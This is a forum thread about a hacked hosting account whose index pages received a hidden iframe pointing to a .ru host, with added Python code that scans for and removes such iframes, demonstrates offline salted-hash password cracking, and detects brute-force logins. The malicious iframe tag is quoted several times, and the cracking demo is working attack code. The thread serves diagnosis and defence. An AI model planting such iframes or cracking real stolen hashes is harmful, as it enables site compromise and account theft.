
Been Hacked


Hooch


Hello all. I have a client who was hacked. All their websites under the one package they have were compromised, so I have to wonder if they cracked their cPanel password. The problem that has occurred is that an iframe was inserted into the code of every index.php and every index.html page on all the sites, even in sub folders. I went and deleted all the code, but it shows back up again after some time. Here's the code...

<iframe src="http://3f4.ru:8080/index.php" width=151 height=198 style="visibility: hidden"></iframe>

Any idea how this would have happened? I'm not sure if it would be through cPanel, or maybe it would be a form I created? Or was the web provider hacked? And if anyone has experience with this, how do I find the hole? I did email the provider's abuse dept., but a quick response from here may save downtime. Thank you


If it's at the very bottom of your PHP and HTML files, i.e.

<?php
// PHP code here
?>
<iframe src="http://3f4.ru:8080/index.php" width=151 height=198 style="visibility: hidden"></iframe>

then it's unlikely that a form you created is the reason... unless you have a form that lets users edit files on the server. If you have such a form, it's possible that the attacker worked around your defences in it to alter PHP files. Otherwise, cracking your FTP and/or cPanel accounts is the more likely cause. Change your password at those places, and make sure it's a strong password too. If you use third-party CMSes (WordPress, Joomla, IPB, etc.), upgrade them to their latest versions, as it is possible that a security hole in THEM led to the demise of your own files.

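A scanner for the symptom described in the reply above (a hidden iframe appended to every index.php and index.html, sub-folders included), added here as an example; it is not code from the thread. It walks the site tree, flags iframes that are both hidden and point off-site, and can strip them while keeping a .bak copy of each file it touches. The sample site it builds is constructed for the demo, and the matching rule (visibility:hidden or display:none together with an external src) is a generalisation of the single tag quoted in the post:

```python
import os
import re
import tempfile

# Any <iframe ...> tag, optionally followed by a closing tag (or the mistyped
# second <iframe> that the post shows in place of </iframe>).
IFRAME_TAG = re.compile(r"<iframe\b[^>]*>(?:\s*</?iframe>)?", re.IGNORECASE)
# "Hidden" is what separates an injected iframe from a legitimate embed:
# visibility:hidden is what the post shows, display:none is the other usual trick.
HIDDEN_STYLE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.IGNORECASE)
# src pointing at another host (http://, https:// or protocol-relative //).
EXTERNAL_SRC = re.compile(r"""\bsrc\s*=\s*["']?\s*(?:https?:)?//""", re.IGNORECASE)

# The tag quoted in the thread, reused as the payload planted in the sample site.
INJECTED = ('<iframe src="http://3f4.ru:8080/index.php" width=151 height=198 '
            'style="visibility: hidden"></iframe>')


def is_injected(tag):
    return bool(HIDDEN_STYLE.search(tag) and EXTERNAL_SRC.search(tag))


def find_injections(text):
    """Return every hidden, off-site iframe tag found in text."""
    return [m.group(0) for m in IFRAME_TAG.finditer(text) if is_injected(m.group(0))]


def clean(text):
    """Remove hidden off-site iframes; return (cleaned_text, number_removed)."""
    removed = 0

    def replace(match):
        nonlocal removed
        if is_injected(match.group(0)):
            removed += 1
            return ""
        return match.group(0)

    return IFRAME_TAG.sub(replace, text), removed


def scan_tree(root, names=("index.php", "index.html"), fix=False):
    """Walk root, sub-folders included, and report infected files as
    {relative_path: injected_iframe_count}. With fix=True the iframes are
    stripped and the original is kept beside the file as <name>.bak."""
    report = {}
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            if name.lower() not in names:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as f:
                text = f.read().decode("latin-1")  # lossless for any byte sequence
            cleaned, count = clean(text)
            if not count:
                continue
            report[os.path.relpath(path, root).replace(os.sep, "/")] = count
            if fix:
                os.replace(path, path + ".bak")
                with open(path, "wb") as f:
                    f.write(cleaned.encode("latin-1"))
    return report


def build_sample_site(root):
    """Constructed sample site: two infected pages, one clean page, one page
    with a legitimate (visible, same-site) iframe, and one non-index file."""
    files = {
        "index.php": "<?php\necho 'home';\n?>\n" + INJECTED + "\n",
        "blog/index.html": "<html><body>blog</body></html>" + INJECTED,
        "shop/index.php": "<?php echo 'clean'; ?>\n",
        "about/index.html": '<iframe src="/video.html" width=300 height=200></iframe>\n',
        "blog/style.css": "body { margin: 0 }\n",
    }
    for rel, content in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(content.encode("latin-1"))


def demo():
    """Build the sample site in a temp dir, scan it, clean it, and rescan."""
    root = tempfile.mkdtemp(prefix="hacked-site-")
    build_sample_site(root)
    before = scan_tree(root)
    fixed = scan_tree(root, fix=True)
    after = scan_tree(root)
    with open(os.path.join(root, "index.php"), "rb") as f:
        home = f.read().decode("latin-1")
    return {"before": before, "fixed": fixed, "after": after, "home": home}


if __name__ == "__main__":
    result = demo()
    for path, count in result["before"].items():
        print(f"{path}: {count} injected iframe(s) removed, backup in {path}.bak")
    print("remaining after clean-up:", result["after"])
```

Run it against the real document root with scan_tree("/path/to/public_html") without fix=True first and read the report before cleaning anything. It only removes what it finds; it says nothing about how the tag got there, and since the writer reports it coming back, the access the attacker is using (the FTP/cPanel credentials or an upload form, as the reply says) still has to be found and closed, which no file clean-up does.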

If you have the option, also use SFTP instead of FTP, as it is more secure.


Okay, thank you Synook. Any help here is very much appreciated. I had a question asked by one of the members: why would they hack us? Why do they want our information? I don't think this was for that. This was more for getting people to visit sites so the hacker can receive $$, correct? Can anyone shed light on what the reason may have been from that code above? Thank you


I think your assumption on ad revenue is a correct one. If your users click those ads, the attacker gets some cash. There's also one more thing to note though. The attacker detects success. He now knows there is a weak link in the chain that he can use to try and do some real damage, like stealing your users' passwords. And once they do that, they could try and use them on other sites to potentially get their banking information at the end and steal their money.

I'm assuming the FTP was cracked. Not sure how, since it was a difficult one. If the cPanel PW was cracked, should I be worried and look for files they may have uploaded? Is this a normal practice? I am looking, but nothing found yet. If they have got hold of the users table in the DB, those passwords were hashed and salted. How could they know what the PW is?


The answer to all of it: brute force attack. If they can get hold of the users table, AND they know your exact hash types and salting algorithms, they can try all possible combinations until the hash matches. Same deal with FTP and cPanel: they try every possible password, and store it. You can easily write a program that does that. You can ask your host if they do some "auditing" on cPanel and FTP, i.e. if they block a certain IP after N unsuccessful login attempts per day.

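The offline attack the reply above describes, worked through as an added example (not code from the thread): a constructed users table hashed as sha256(salt + password), a tiny wordlist, and an exhaustive search over short passwords. The users, salts, passwords and the hashing scheme are all assumptions for the demo, standing in for whatever the real site uses:

```python
import hashlib
import hmac
import itertools
import string

ALGORITHM = "sha256"  # assumed scheme: hex(sha256(salt + password)); the attacker must know this


def hash_password(password, salt):
    return hashlib.new(ALGORITHM, (salt + password).encode()).hexdigest()


# Constructed users table, as the attacker would have it after dumping the DB.
# The salts sit next to the hashes, so they do not slow down guessing one user;
# they only stop a single precomputed table from cracking every user at once.
USERS = [
    {"user": "alice", "salt": "k9Qz", "hash": hash_password("sunshine", "k9Qz")},
    {"user": "bob",   "salt": "x2Pm", "hash": hash_password("a4!Vq9#Lr2^w", "x2Pm")},
    {"user": "carol", "salt": "j7Tn", "hash": hash_password("dog", "j7Tn")},
]

# A tiny constructed wordlist; real ones hold millions of leaked passwords.
WORDLIST = ["123456", "password", "letmein", "sunshine", "qwerty", "dragon"]


def dictionary_attack(record, wordlist):
    """Hash each candidate with the user's own salt; return the match or None."""
    for guess in wordlist:
        if hmac.compare_digest(hash_password(guess, record["salt"]), record["hash"]):
            return guess
    return None


def exhaustive_attack(record, alphabet, max_len):
    """Try every string over alphabet with length 1..max_len.

    Returns (password or None, number_of_guesses). Each guess costs one hash,
    so the total is bounded by keyspace(len(alphabet), max_len).
    """
    tried = 0
    for length in range(1, max_len + 1):
        for combo in itertools.product(alphabet, repeat=length):
            tried += 1
            guess = "".join(combo)
            if hash_password(guess, record["salt"]) == record["hash"]:
                return guess, tried
    return None, tried


def keyspace(alphabet_size, max_len):
    """Number of guesses needed to exhaust all lengths 1..max_len."""
    return sum(alphabet_size ** n for n in range(1, max_len + 1))


def crack_all(users, wordlist):
    return {u["user"]: dictionary_attack(u, wordlist) for u in users}


if __name__ == "__main__":
    print(crack_all(USERS, WORDLIST))
    pw, n = exhaustive_attack(USERS[2], string.ascii_lowercase, 3)
    print(f"carol: {pw!r} after {n} guesses (keyspace {keyspace(26, 3)})")
    # bob's 12-character mixed password lives in a space of about 94**12 guesses
    print(f"bob: keyspace {keyspace(len(string.printable.strip()), 12):.2e}")
```

The dictionary attack recovers alice's common password at once, and the exhaustive search recovers carol's three-letter one after a few thousand hashes, salt or no salt, because the salt is stored next to the hash. bob's 12-character mixed password survives both: the wordlist misses it and the keyspace is far beyond what anyone will try. That is why the advice to have members change any password they reuse elsewhere is the important one.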

Steps done so far:
1. Changed passwords for cPanel and FTP.
2. Changed password for the database.

To do:
1. Ask members of the site to change their password and also change passwords that are the same on other important sites (i.e. banking).
2. Look into blocking IPs after numerous login failures.

Anything else you would recommend? And thank you for your time and knowledge on this issue.

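For item 2 of the to-do list above, blocking IPs after repeated login failures, here is an added example (not from the thread) of the rule run over constructed log lines in a made-up format: a per-IP sliding window that locks an address out after five failures within ten minutes, plus a per-account check for the case a per-IP rule misses, one account being hit from many addresses at once. The log format, the thresholds and the addresses (RFC 5737 documentation ranges) are all assumptions for the demo:

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed log lines in a made-up format: timestamp, service, result, user, ip.
# Real ftpd/cPanel logs look different; only parse() would need to change.
LOG_LINES = """\
2009-03-12 02:00:05 ftpd FAIL user=hooch ip=203.0.113.7
2009-03-12 02:00:09 ftpd FAIL user=hooch ip=203.0.113.7
2009-03-12 02:00:14 ftpd FAIL user=hooch ip=203.0.113.7
2009-03-12 02:00:18 ftpd FAIL user=hooch ip=203.0.113.7
2009-03-12 02:00:23 ftpd FAIL user=hooch ip=203.0.113.7
2009-03-12 02:00:27 ftpd FAIL user=hooch ip=203.0.113.7
2009-03-12 02:00:31 ftpd OK user=hooch ip=203.0.113.7
2009-03-12 09:10:00 cpanel FAIL user=hooch ip=198.51.100.20
2009-03-12 09:31:00 cpanel FAIL user=hooch ip=198.51.100.20
2009-03-12 09:31:20 cpanel OK user=hooch ip=198.51.100.20
2009-03-12 11:00:00 ftpd FAIL user=hooch ip=192.0.2.11
2009-03-12 11:00:02 ftpd FAIL user=hooch ip=192.0.2.12
2009-03-12 11:00:04 ftpd FAIL user=hooch ip=192.0.2.13
2009-03-12 11:00:06 ftpd FAIL user=hooch ip=192.0.2.14
""".splitlines()

LINE = re.compile(r"^(\S+ \S+) (\w+) (FAIL|OK) user=(\S+) ip=(\S+)$")


def parse(line):
    m = LINE.match(line)
    if not m:
        raise ValueError("unparsed line: " + line)
    ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
    return ts, m.group(2), m.group(3), m.group(4), m.group(5)


def ip_lockouts(lines, max_failures=5, window=timedelta(minutes=10)):
    """Per-IP sliding-window lockout.

    Returns (blocked, prevented): blocked maps each IP to the time it would
    have been cut off; prevented lists the logins that succeeded after that
    point, i.e. the ones the rule would actually have stopped.
    """
    recent = defaultdict(deque)
    blocked, prevented = {}, []
    for ts, _svc, result, user, ip in map(parse, lines):
        if ip in blocked:
            if result == "OK":
                prevented.append((str(ts), user, ip))
            continue
        if result == "FAIL":
            q = recent[ip]
            q.append(ts)
            while ts - q[0] > window:  # drop failures older than the window
                q.popleft()
            if len(q) >= max_failures:
                blocked[ip] = str(ts)
    return blocked, prevented


def distributed_targets(lines, min_ips=4, window=timedelta(minutes=10)):
    """Accounts failing from many IPs inside one window: a per-IP rule alone
    never trips on these, because each address stays under the threshold."""
    recent = defaultdict(deque)
    flagged = {}
    for ts, _svc, result, user, ip in map(parse, lines):
        if result != "FAIL" or user in flagged:
            continue
        q = recent[user]
        q.append((ts, ip))
        while ts - q[0][0] > window:
            q.popleft()
        if len({addr for _, addr in q}) >= min_ips:
            flagged[user] = str(ts)
    return flagged


if __name__ == "__main__":
    blocked, prevented = ip_lockouts(LOG_LINES)
    print("would block:", blocked)
    print("logins the block would have stopped:", prevented)
    print("accounts sprayed from many IPs:", distributed_targets(LOG_LINES))
```

On the sample, 203.0.113.7 is cut off at its fifth failure and the login that succeeds eight seconds later is the one the rule would have prevented; 198.51.100.20, two typos twenty minutes apart, is left alone; and the four 192.0.2.x addresses never trip the per-IP rule but together flag the "hooch" account. A host that only counts failures per IP per day, as the earlier reply describes, catches the first case and not the third.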

What happened to using SFTP? :) Remember, if you use normal FTP your password is sent in plain to the server.


http://whois.domaintools.com/3f4.ru
Try this maybe? There is a number. It is very odd though that each time you refresh the IP changes. After a few tries I got this one, 62.112.155.45; it seems to be the correct one. I did a whois search on the IP and it came up with this:
http://www.networksolutions.com/whois/resu...p=62.112.155.45
Then I managed to get this:
http://www.db.ripe.net/whois?form_type=sim...o_search=Search
